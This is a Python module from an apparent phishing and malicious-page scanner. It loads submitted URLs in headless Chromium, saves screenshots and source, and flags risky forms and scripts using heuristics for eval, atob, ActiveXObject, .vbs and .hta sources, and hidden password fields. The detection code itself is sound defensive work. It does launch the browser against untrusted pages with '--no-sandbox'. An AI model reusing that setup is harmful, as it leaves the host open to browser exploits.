SneakyScope/app/browser.py

import re
import uuid
import json
from pathlib import Path
from bs4 import BeautifulSoup
from datetime import datetime
from urllib.parse import urlparse
from typing import Dict, Any, Optional
from playwright.async_api import async_playwright, TimeoutError as PWTimeoutError

from flask import current_app  # access the rule engine from app config

from app.utils.io_helpers import safe_write
from .enrichment import enrich_url

def get_rule_engine():
    """
    Retrieve the rules engine instance from the Flask application config.

    Returns:
        RuleEngine or None: The engine if available, or None if not configured.
    """
    try:
        # current_app is only available during an active request context
        engine = current_app.config.get("RULE_ENGINE")
        return engine
    except Exception:
        # If called outside a Flask request context, fail gracefully
        return None


def run_rule_checks(text, category):
    """
    Run all rules for a given category against the provided text.

    Args:
        text (str): The content to test (e.g., form snippet, inline JS).
        category (str): The rule category to run (e.g., 'form' or 'script').

    Returns:
        dict: {
            "checks": [ { "rule": str, "category": str, "matched": bool, "reason": Optional[str] }, ... ],
            "summary": { "matched_count": int, "total_rules": int }
        }
    """
    result = {
        "checks": [],
        "summary": {
            "matched_count": 0,
            "total_rules": 0
        }
    }

    engine = get_rule_engine()
    if engine is None:
        # No engine configured; return empty but well-formed structure
        return result

    try:
        # Run engine rules for the specified category
        check_results = engine.run_all(text, category=category)

        # Normalize results into the expected structure
        total = 0
        matched = 0

        for item in check_results:
            # item is expected to contain: rule, category, matched, reason (optional)
            total = total + 1
            if bool(item.get("matched")):
                matched = matched + 1

            normalized = {
                "rule": item.get("rule"),
                "category": item.get("category"),
                "matched": bool(item.get("matched")),
                "reason": item.get("reason")
            }
            result["checks"].append(normalized)

        result["summary"]["matched_count"] = matched
        result["summary"]["total_rules"] = total

    except Exception as e:
        # If anything goes wrong, keep structure and add a fake failure note
        result["checks"].append({
            "rule": "engine_error",
            "category": category,
            "matched": False,
            "reason": f"Rule engine error: {e}"
        })
        result["summary"]["matched_count"] = 0
        result["summary"]["total_rules"] = 0

    return result


def analyze_forms(html: str, base_url: str):
    """
    Parse forms from the page HTML and apply heuristic flags and rule-based checks.

    Args:
        html (str): The full page HTML.
        base_url (str): The final URL of the page (used for hostname comparisons).

    Returns:
        list[dict]: A list of form analysis dictionaries, each including:
            - action, method, inputs
            - flagged (bool), flag_reasons (list[str]), status (str)
            - rule_checks: dict with "checks" (list) and "summary" (dict)
    """
    soup = BeautifulSoup(html, "lxml")
    forms_info = []
    page_hostname = urlparse(base_url).hostname

    for form in soup.find_all("form"):
        action = form.get("action")
        method = form.get("method", "get").lower()

        # Build explicit inputs list
        inputs = []
        for inp in form.find_all("input"):
            input_name = inp.get("name")
            input_type = inp.get("type", "text")
            inputs.append({
                "name": input_name,
                "type": input_type
            })

        flagged_reasons = []

        # No action specified
        if not action or str(action).strip() == "":
            flagged_reasons.append("No action specified")

        # External host
        else:
            try:
                action_host = urlparse(action).hostname
                if not str(action).startswith("/") and action_host != page_hostname:
                    flagged_reasons.append("Submits to a different host")
            except Exception:
                # If hostname parsing fails, skip this condition quietly
                pass

        # HTTP form on HTTPS page
        try:
            if urlparse(action).scheme == "http" and urlparse(base_url).scheme == "https":
                flagged_reasons.append("Submits over insecure HTTP")
        except Exception:
            # If scheme parsing fails, ignore
            pass

        # Hidden password / suspicious hidden inputs
        for hidden in form.find_all("input", type="hidden"):
            name_value = hidden.get("name") or ""
            if "password" in name_value.lower():
                flagged_reasons.append("Hidden password field")

        flagged = bool(flagged_reasons)

        # Serialize a simple form snippet for the rules engine to analyze (category='form')
        snippet_lines = []
        snippet_lines.append(f"action={action}")
        snippet_lines.append(f"method={method}")
        snippet_lines.append("inputs=")
        for item in inputs:
            snippet_lines.append(f"  - name={item.get('name')} type={item.get('type')}")
        form_snippet = "\n".join(snippet_lines)

        rule_checks = run_rule_checks(form_snippet, category="form")

        forms_info.append({
            "action": action,
            "method": method,
            "inputs": inputs,
            "flagged": flagged,
            "flag_reasons": flagged_reasons,
            "status": "flagged" if flagged else "possibly safe",
            "rule_checks": rule_checks
        })

    return forms_info


def analyze_scripts(html: str, base_url: str = "", engine=None) -> list[dict]:
    """
    Analyze <script> elements using the RuleEngine (if provided) and
    lightweight built-in heuristics. Only append a record when at least
    one rule or heuristic matches, and always set a sensible 'type'.

    Returns list of dicts like:
      {
        "type": "external" | "inline" | "unknown",
        "src": "...",                 # for external
        "content_snippet": "...",     # for inline
        "rules": [ { "name": "...", "description": "..." }, ... ],
        "heuristics": [ "reason1", "reason2", ... ]
      }
    """
    soup = BeautifulSoup(html, "lxml")
    results: list[dict] = []

    import re
    from urllib.parse import urlparse

    # Benign MIME types we ignore entirely
    benign_types = {"application/ld+json", "application/json"}

    # Suspicious file extensions for external scripts
    dangerous_ext = (".vbs", ".hta")

    # Inline red flags
    risky_inline_patterns = [
        (re.compile(r"\beval\s*\(", re.IGNORECASE), "Uses eval()"),
        (re.compile(r"\bnew\s+Function\s*\(", re.IGNORECASE), "Uses Function constructor"),
        (re.compile(r"\bdocument\.write\s*\(", re.IGNORECASE), "Uses document.write()"),
        (re.compile(r"\bActiveXObject\s*\(", re.IGNORECASE), "Uses ActiveXObject (IE-only)"),
        (re.compile(r"\batob\s*\(", re.IGNORECASE), "Uses atob() (possible obfuscation)"),
        (re.compile(r"\bunescape\s*\(", re.IGNORECASE), "Uses unescape() (legacy/obfuscation)"),
        (re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"`].+['\"`]\s*,", re.IGNORECASE),
         "String passed to setTimeout/setInterval"),
        (re.compile(r"[\"']?0x[0-9a-fA-F]{16,}[\"']?", re.IGNORECASE),
         "Contains long hex-like constants (possible obfuscation)"),
    ]

    base_host = urlparse(base_url).hostname or ""

    for script in soup.find_all("script"):
        try:
            src = (script.get("src") or "").strip()
            s_type_attr = (script.get("type") or "").strip().lower()

            # IMPORTANT: .string is often None; get_text() is reliable
            inline_text = script.get_text(strip=True) or ""

            # Skip benign structured data outright
            if s_type_attr in benign_types:
                continue

            # ---- Build facts for the rules engine
            facts = {
                "script_type_attr": s_type_attr or None,
                "has_src": bool(src),
                "src": src or None,
                "attrs": dict(script.attrs),
                "inline_len": len(inline_text),
                "inline_preview": inline_text[:200].replace("\n", " ") if inline_text else None,
                "base_url": base_url or None,
                "base_hostname": base_host or None,
                "src_hostname": urlparse(src).hostname if src else None,
            }

            # ---- Evaluate rules engine (using name/description)
            engine_matches: list[dict] = []
            if engine is not None:
                try:
                    if hasattr(engine, "evaluate_script"):
                        matches = engine.evaluate_script(facts)
                    elif hasattr(engine, "evaluate"):
                        matches = engine.evaluate(facts)
                    else:
                        matches = []

                    if isinstance(matches, list):
                        for m in matches:
                            if isinstance(m, dict) and "name" in m:
                                engine_matches.append({
                                    "name": m["name"],
                                    "description": m.get("description", "")
                                })
                            elif isinstance(m, str):
                                engine_matches.append({"name": m, "description": ""})
                except Exception as e:
                    engine_matches.append({"name": "Rules Engine Error", "description": str(e)})

            # ---- Built-in heuristics
            heuristics: list[str] = []
            if src:
                # Unusual URL schemes for script sources
                if src.startswith(("data:", "blob:")):
                    heuristics.append("Script src uses data:/blob: URL")
                # Dangerous extensions
                for ext in dangerous_ext:
                    if src.lower().endswith(ext):
                        heuristics.append(f"External script with dangerous extension ({ext.lstrip('.')})")
                        break
                # Third-party host hint
                src_host = facts.get("src_hostname") or ""
                if base_host and src_host and src_host != base_host:
                    heuristics.append(f"Third-party host: {src_host}")
            else:
                if inline_text:
                    for pat, why in risky_inline_patterns:
                        if pat.search(inline_text):
                            heuristics.append(why)

            # ---- Only append when something matched; always set type
            if engine_matches or heuristics:
                record: dict = {}

                if src:
                    record["type"] = "external"
                    record["src"] = src
                elif inline_text:
                    record["type"] = "inline"
                    record["content_snippet"] = facts.get("inline_preview")
                else:
                    record["type"] = "unknown"

                if engine_matches:
                    record["rules"] = engine_matches
                if heuristics:
                    record["heuristics"] = heuristics

                results.append(record)

        except Exception as e:
            # Never let a single broken <script> kill the whole analysis
            results.append({
                "type": "unknown",
                "heuristics": [f"Script analysis error: {e}"]
            })

    return results


async def fetch_page_artifacts(url: str, storage_dir: Path, engine=None) -> Dict[str, Any]:
    """
    Fetch page artifacts and save them in a UUID-based directory.

    Args:
        url (str): URL to analyze.
        storage_dir (Path): Base /data path.
        engine: Optional rules engine instance (from app.config["RULE_ENGINE"]).
    """
    run_uuid = str(uuid.uuid4())
    run_dir = storage_dir / run_uuid
    run_dir.mkdir(parents=True, exist_ok=True)

    screenshot_path = run_dir / "screenshot.png"
    source_path = run_dir / "source.txt"
    results_path = run_dir / "results.json"

    redirects = []
    downloads = []
    scripts = []

    async with async_playwright() as pw:
        browser = await pw.chromium.launch(
            headless=True,
            args=["--no-sandbox", "--disable-dev-shm-usage", "--disable-blink-features=AutomationControlled"]
        )
        context = await browser.new_context(
            viewport={"width": 1920, "height": 1080},
            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            java_script_enabled=True,
            locale="en-US"
        )
        page = await context.new_page()

        # Event handlers
        page.on("response", lambda resp: redirects.append({"status": resp.status, "url": resp.url}) if 300 <= resp.status <= 399 else None)
        page.on("download", lambda d: downloads.append({"url": d.url, "suggested_filename": d.suggested_filename}))
        page.on("request", lambda r: scripts.append(r.url) if r.url.endswith((".js", ".vbs", ".hta")) else None)

        try:
            await page.goto(url, wait_until="networkidle", timeout=60000)
            final_url = page.url
            await page.screenshot(path=str(screenshot_path), full_page=True)
            html = await page.content()
            safe_write(source_path, html)
        except PWTimeoutError:
            final_url = page.url
            safe_write(source_path, "Page did not fully load (timeout)")
            await page.screenshot(path=str(screenshot_path), full_page=True)

        await context.close()
        await browser.close()

    html_content = source_path.read_text(encoding="utf-8")
    forms_info = analyze_forms(html_content, final_url)
    suspicious_scripts = analyze_scripts(html_content, base_url=final_url, engine=engine)

    enrichment = enrich_url(url)

    result = {
        "uuid": run_uuid,
        "submitted_url": url,
        "final_url": final_url,
        "redirects": redirects,
        "downloads": downloads,
        "scripts": scripts,
        "forms": forms_info,
        "suspicious_scripts": suspicious_scripts,
        "enrichment": enrichment
    }

    safe_write(results_path, json.dumps(result, indent=2))
    return result